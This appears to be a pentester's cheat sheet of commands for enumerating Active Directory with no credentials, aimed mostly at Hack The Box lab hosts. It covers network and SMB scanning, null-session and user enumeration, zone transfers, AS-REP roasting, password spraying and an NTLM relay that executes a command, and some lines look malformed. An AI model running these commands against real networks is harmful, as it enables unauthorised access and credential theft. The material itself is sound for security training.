No Credentials

Network Scanning

Scan Network

nmap -sP -p -Pn <ip>
nmap -Pn -sV --top-ports 50 --open <ip>
nmap -Pn --script-smb-vuln -p139,445 <ip>
nmap -Pn -sC -sV -oN <OutPutFile> <ip>
nmap -Pn -sC -sV -p- -oN <OutPutFile> <ip>
nmap -Pn -sU -sC -sV -oN <OutPutFile> <ip>
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>

SNMP Check

snmp-check 10.10.31.2 -c openview

CME

#Map Hosts
cme smb 192.168.1.0/24

#Map SMB hosts that DO NOT require signing
cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt

#Enumerate Null Sessions
cme smb 10.10.10.161 -u '' -p ''
cme smb 10.10.10.161 --pass-pol
cme smb 10.10.10.161 --users
cme smb 10.10.10.161 --groups

#Enumerate Anonymous Login
cme smb 10.10.10.178 -u 'a' -p ''

#Extract Subnet
cme ldap <ip> -u <user> -p <pass> -M get-network
cme ldap <ip> -u <user> -p <pass> -M get-network -o ONLY_HOSTS=true
cme ldap <ip> -u <user> -p <pass> -M get-network -o ALL=true

GoBuster

gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt

Find DC IP

nmcli dev show eth0 #Shows domain names and DNS
nslookup -type=SRV_ldap_tcp.dc_msdcs <domain>

Zone Transfer

dig axfr @10.10.10.192 blackfield.local
dig @10.10.10.192 ForestDnsZones.BLACKFIELD.local

LDAP Search

ldapsearch -H 10.10.10.192 -x -s base namingcontexts

wfuzz vhost discovery

sudo wfuzz -c -f subdomains.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154

enum4linux -a -u "" -p "" <dc-ip>
enum4linux -a -u "guest" -p "" <dc-ip>

smbmap -u "" -p "" -P 445 -H <dc-ip>
smbmap -u "guest" -p "" -P 445 -H <dc-ip>

smbclient -U "%" -L //<dc-ip>
smbclient -U "guest%" -L //<dc-ip>

cme smb <ip> -u "" -p ""
cme smb <ip> -u "a" -p ""

Enumerate Users

CME

#Check for anon login
cme smb domain.local  -u '' -p '' --users
cme smb domain.local  -u '' -p '' --users | awk '{print $4}' | uniq

#Check for users/groups and active sessions
cme smb 10.10.10.10 --users
cme smb 10.10.10.10 --groups 
cme smb 10.10.10.10 --groups --loggedon-users 

#Check if account exists without kerberos
cme ldap 192.168.1.0/24 -u users.txt -p '' -k

#Check for ASREPRoastable
cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt

Kerbrute

kerbrute userenum -d test.local usernames.txt

Impacket

impacket-GetNPUsers -no-pass -dc-ip 10.10.10.192 blackfield.local/
GetNPUsers.py -no-pass -usersfile names.txt -format hashcat -dc-ip 10.10.10.169 MEGABANK.LOCAL/

NMAP

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>

MetaSploit

msf> use auxiliary/gather/kerberos_enumusers
msf> use auxiliary/scanner/smb/smb_lookupsid

SMBmap

python3 smbmap.py --host-file smb-hosts.txt -d test.local -L

Rubeus

Rubeus.exe /users:usernames.txt /passwords:passwords.txt /domain:test.local /outfile:found_passwords.txt

NTLMRelay

python3 ntlmrelayx.py -smb2support -t smb://10.10.10.1 -c 'whoami /all' -debug

PreviousEnumeration NextPowerView Enumeration

Last updated 3 years ago

No Credentials

Network Scanning

Scan Network

SNMP Check

CME

GoBuster

Find DC IP

Zone Transfer

LDAP Search

wfuzz vhost discovery

List Guest Access on SMB Share

Enumerate Users

CME

Kerbrute

Impacket

NMAP

MetaSploit

SMBmap

Rubeus

NTLMRelay